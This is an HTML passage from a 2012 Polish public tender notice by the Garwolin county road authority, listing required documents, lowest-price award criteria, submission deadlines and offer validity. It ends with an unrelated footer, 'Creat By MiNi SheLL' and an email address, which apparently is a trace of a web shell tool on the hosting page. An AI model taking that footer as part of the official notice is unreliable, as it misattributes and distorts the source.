<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia gdy wykonawca sam nie dysponuje takim potencjałem. Wykaz podmiotów, które będą uczestniczyć w wykonaniu zamówienia jako podwykonawcy wraz z podaniem ich nazw, a także zakresu wykonywanych przez nich czynności - załącznik nr 6 SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pzdgarwolin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Zarząd Dróg w Garwolinie  ul. Przemysłowa 45,  08-410  Wola Rębkowska, pokój nr 6..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2012 godzina 09:30, miejsce: Powiatowy Zarząd Dróg w Garwolinie ul. Przemysłowa 45,  08-410  Wola Rębkowska, 
 pokój nr 3  tj. sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com